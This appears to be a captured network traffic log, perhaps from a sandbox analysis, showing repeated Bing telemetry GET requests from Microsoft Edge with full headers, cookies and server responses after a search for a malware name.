cookie: bm_sv=DE1BAE809C3BB39BA4C720F959BCB395~YAAQwnd7XFaoJoySAQAATjxLnBlxCHeTPAuJ+2E8KX4UPJL8fjGlWbleHQrsTckqsOLTAcrpUMpeYW4YKBhkI7uNrxvpERx85lAtdCelv+Xy0V5hSjFG1HZQmfcvRhNlYdQXLNKem5gvH9iKPJPttZVx+Z9vJ0QBDvP1YygNcTw35m4haIGW4Ujsg9GRXVY8Gr5yEMprIZHo4FDqP5drqVsOzIAuTOS5D2Z7RLXdYSQ22lYHPN0OG5Cd7YUhEA==~1

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:50 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199030.14913055
GET

https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1729199029282%2C%22Name%22%3A%22Base%22%2C%22FID%22%3A%22CI%22%7D%2C%7B%22Rtt%22%3A%2250%22%2C%22Downlink%22%3A%2210%22%2C%22T%22%3A%22CI.NetworkPerformance%22%2C%22TS%22%3A1729199029283%2C%22Name%22%3A%22timinginfo%22%2C%22FID%22%3A%22NetworkPerformanceDetails%22%7D%2C%7B%22T%22%3A%22CI.SCArrST%22%2C%22TS%22%3A1729199029296%2C%22Name%22%3A506%2C%22FID%22%3A%22SCArrST%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199029296%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22EdgeSpoofing%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199029298%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DM%22%7D%5D

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1729199029282%2C%22Name%22%3A%22Base%22%2C%22FID%22%3A%22CI%22%7D%2C%7B%22Rtt%22%3A%2250%22%2C%22Downlink%22%3A%2210%22%2C%22T%22%3A%22CI.NetworkPerformance%22%2C%22TS%22%3A1729199029283%2C%22Name%22%3A%22timinginfo%22%2C%22FID%22%3A%22NetworkPerformanceDetails%22%7D%2C%7B%22T%22%3A%22CI.SCArrST%22%2C%22TS%22%3A1729199029296%2C%22Name%22%3A506%2C%22FID%22%3A%22SCArrST%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199029296%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22EdgeSpoofing%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199029298%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DM%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4
cookie: bm_sv=DE1BAE809C3BB39BA4C720F959BCB395~YAAQwnd7XFaoJoySAQAATjxLnBlxCHeTPAuJ+2E8KX4UPJL8fjGlWbleHQrsTckqsOLTAcrpUMpeYW4YKBhkI7uNrxvpERx85lAtdCelv+Xy0V5hSjFG1HZQmfcvRhNlYdQXLNKem5gvH9iKPJPttZVx+Z9vJ0QBDvP1YygNcTw35m4haIGW4Ujsg9GRXVY8Gr5yEMprIZHo4FDqP5drqVsOzIAuTOS5D2Z7RLXdYSQ22lYHPN0OG5Cd7YUhEA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:50 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199030.149132d3
GET

https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199029298%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DARKMODE%22%7D%5D

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199029298%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DARKMODE%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4
cookie: bm_sv=DE1BAE809C3BB39BA4C720F959BCB395~YAAQwnd7XFaoJoySAQAATjxLnBlxCHeTPAuJ+2E8KX4UPJL8fjGlWbleHQrsTckqsOLTAcrpUMpeYW4YKBhkI7uNrxvpERx85lAtdCelv+Xy0V5hSjFG1HZQmfcvRhNlYdQXLNKem5gvH9iKPJPttZVx+Z9vJ0QBDvP1YygNcTw35m4haIGW4Ujsg9GRXVY8Gr5yEMprIZHo4FDqP5drqVsOzIAuTOS5D2Z7RLXdYSQ22lYHPN0OG5Cd7YUhEA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:50 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199030.149132d2
GET

https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&Type=Event.ClientInst&DATA=[{%22T%22:%22Info%22,%22FID%22:%22CI%22,%22Name%22:%22HasRR%22,%22Text%22:%221%22}]

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&Type=Event.ClientInst&DATA=[{%22T%22:%22Info%22,%22FID%22:%22CI%22,%22Name%22:%22HasRR%22,%22Text%22:%221%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4
cookie: bm_sv=DE1BAE809C3BB39BA4C720F959BCB395~YAAQwnd7XFaoJoySAQAATjxLnBlxCHeTPAuJ+2E8KX4UPJL8fjGlWbleHQrsTckqsOLTAcrpUMpeYW4YKBhkI7uNrxvpERx85lAtdCelv+Xy0V5hSjFG1HZQmfcvRhNlYdQXLNKem5gvH9iKPJPttZVx+Z9vJ0QBDvP1YygNcTw35m4haIGW4Ujsg9GRXVY8Gr5yEMprIZHo4FDqP5drqVsOzIAuTOS5D2Z7RLXdYSQ22lYHPN0OG5Cd7YUhEA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824

Response

HTTP/2.0 200

content-length: 17767
content-type: text/html; charset=utf-8
cache-control: private
content-encoding: gzip
vary: Accept-Encoding
x-eventid: 67117bb6333743aab3758566f0cae9f9
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-0QR/ljdMdf29xSPtlq6GfkSeYcclvL1r4qajo/W9R1I='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 17 Oct 2024 21:03:50 GMT
set-cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:50 GMT; path=/; secure; SameSite=None
set-cookie: bm_sv=; domain=.bing.com; expires=Thu, 01-Jan-1970 08:00:00 GMT; path=/; secure; SameSite=None
set-cookie: bm_sv=; expires=Thu, 01-Jan-1970 08:00:00 GMT; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199030.14913357
GET

https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22CharCount%22,%22Text%22:%2217%22}]

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22CharCount%22,%22Text%22:%2217%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4
cookie: bm_sv=DE1BAE809C3BB39BA4C720F959BCB395~YAAQwnd7XFaoJoySAQAATjxLnBlxCHeTPAuJ+2E8KX4UPJL8fjGlWbleHQrsTckqsOLTAcrpUMpeYW4YKBhkI7uNrxvpERx85lAtdCelv+Xy0V5hSjFG1HZQmfcvRhNlYdQXLNKem5gvH9iKPJPttZVx+Z9vJ0QBDvP1YygNcTw35m4haIGW4Ujsg9GRXVY8Gr5yEMprIZHo4FDqP5drqVsOzIAuTOS5D2Z7RLXdYSQ22lYHPN0OG5Cd7YUhEA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:03:50 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199030.14913397
GET

https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22LandingRows%22,%22Text%22:%221%22}]

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22LandingRows%22,%22Text%22:%221%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4
cookie: bm_sv=DE1BAE809C3BB39BA4C720F959BCB395~YAAQwnd7XFaoJoySAQAATjxLnBlxCHeTPAuJ+2E8KX4UPJL8fjGlWbleHQrsTckqsOLTAcrpUMpeYW4YKBhkI7uNrxvpERx85lAtdCelv+Xy0V5hSjFG1HZQmfcvRhNlYdQXLNKem5gvH9iKPJPttZVx+Z9vJ0QBDvP1YygNcTw35m4haIGW4Ujsg9GRXVY8Gr5yEMprIZHo4FDqP5drqVsOzIAuTOS5D2Z7RLXdYSQ22lYHPN0OG5Cd7YUhEA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824

Response

HTTP/2.0 200

content-length: 839
content-type: text/html; charset=utf-8
cache-control: no-cache, no-store, must-revalidate
content-encoding: gzip
expires: -1
pragma: no-cache
vary: Accept-Encoding
x-eventid: 67117bb6338849ea9c94a977b8f65023
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-fgux6cA3BhcjXlCYj4+KHyR7sYBzvP93LqBlFCxriTw='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
x-ceto-ref: 67117bb6338849ea9c94a977b8f65023|AFD:67117bb6338849ea9c94a977b8f65023|2024-10-17T21:03:50.442Z
date: Thu, 17 Oct 2024 21:03:50 GMT
set-cookie: _C_ETH=1; expires=Wed, 16 Oct 2024 21:03:50 GMT; domain=.bing.com; path=/; secure; httponly
set-cookie: _C_Auth=
set-cookie: bm_sv=; domain=.bing.com; expires=Thu, 01-Jan-1970 08:00:00 GMT; path=/; secure; SameSite=None
